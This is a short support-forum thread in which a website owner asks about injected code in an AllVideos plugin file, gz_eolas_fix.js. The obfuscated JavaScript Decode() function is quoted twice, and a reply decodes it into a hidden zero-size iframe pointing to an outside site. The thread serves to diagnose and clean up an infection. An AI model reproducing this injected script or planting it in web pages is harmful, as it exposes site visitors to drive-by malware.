- Posts: 8
COMMUNITY FORUM
What is this file???
- ronildo
-
Topic Author
- Offline
- New Member
Less
More
16 years 8 months ago #15713
by ronildo
What is this file??? was created by ronildo
Guys, I'm using this great tool, but I guess, I'm having my website hacking.
And would like to know whats happen with this file "gz_eolas_fix.js".
Common it is this way:What is this function??
And later it stay this way:
I'm sorry my bad english... lol
And would like to know whats happen with this file "gz_eolas_fix.js".
Common it is this way:
function writethis(what) {
document.write(what);
}And later it stay this way:
function writethis(what) {
document.write(what);
}
function Decode()
{
var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61";
str+="!34!104!116!116!112!58!47!47!116!104!101!111!116!104!101!114!115!105!122";
str+="!101!46!99!111!109!47!77!111!117!115!101!47!34!32!119!105!100!116!104!61";
str+="!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100";
str+="!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
c++;out=out+String.fromCharCode(temp);temp="";
}
document.write(out);
}
Decode();I'm sorry my bad english... lol
Please Log in or Create an account to join the conversation.
- Xyborg
-
- Offline
- New Member
Less
More
- Posts: 1
16 years 8 months ago #15714
by Xyborg
Replied by Xyborg on topic Re: What is this file???
Hi, I just came here googling for the text "str+="!34!104!116!116!112!58!47!47!116!104!101!111!116!104!101!114!115!105!122";", I'm doing a malware research and I can ensure you that the following function is executing an exploit to infect the users who visit your website. Please remove the function Decode ASAP.
Are you hosting your website on Dreamhost? I'm asking that because I found a lot of infected webs on DH, and I want to know if this is a massive attack or something else.
Please post the date of the last modification of the file gz_eolas_fix.js :)
function Decode()
{
var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61";
str+="!34!104!116!116!112!58!47!47!116!104!101!111!116!104!101!114!115!105!122";
str+="!101!46!99!111!109!47!77!111!117!115!101!47!34!32!119!105!100!116!104!61";
str+="!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100";
str+="!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
c++;out=out+String.fromCharCode(temp);temp="";
}
document.write(out);
}
Decode();
Are you hosting your website on Dreamhost? I'm asking that because I found a lot of infected webs on DH, and I want to know if this is a massive attack or something else.
Please post the date of the last modification of the file gz_eolas_fix.js :)
Please Log in or Create an account to join the conversation.
- ronildo
-
- Offline
- New Member
Less
More
- Posts: 8
16 years 8 months ago - 16 years 8 months ago #15715
by ronildo
Replied by ronildo on topic Re: What is this file???
Yeah... I'm hosting on Dreamhost.
Every time that I remove the code, they put again.
I will search the date of the modification.
Every time that I remove the code, they put again.
I will search the date of the modification.
Please Log in or Create an account to join the conversation.
- HIGMoose
-
- Offline
- New Member
Less
More
- Posts: 1
16 years 7 months ago #15716
by HIGMoose
Replied by HIGMoose on topic Re: What is this file???
The function translates the decimal into ascii with ! as a delimiter...
Thus, it becomes...
<iframe src="theothersize.com/Mouse/" width=0 height=0 frameborder=0>
So, when it is run it inserts an iframe to that url location.
Thus, it becomes...
<iframe src="theothersize.com/Mouse/" width=0 height=0 frameborder=0>
So, when it is run it inserts an iframe to that url location.
Please Log in or Create an account to join the conversation.
- ronildo
-
- Offline
- New Member
Less
More
- Posts: 8
16 years 7 months ago #15717
by ronildo
Replied by ronildo on topic Re: What is this file???
My problem was permissions in the folders.
Please Log in or Create an account to join the conversation.
- JoomlaWorks
-
- Offline
- Admin
Less
More
- Posts: 6227
16 years 7 months ago #15718
by JoomlaWorks
Fotis / JoomlaWorks Support Team
---
Please search the forum before posting a new topic :)
Replied by JoomlaWorks on topic Re: What is this file???
This function was used to bypass the notorious EOLAS issue ("click to activate"), concerning video playback on IE browsers. This is now NOT used on the 2.5.x series of AllVideos, we use other methods to bypass EOLAS (although Microsoft has cut a deal with EOLAS to remove this "click to activate" issue on IE).
Fotis / JoomlaWorks Support Team
---
Please search the forum before posting a new topic :)
Please Log in or Create an account to join the conversation.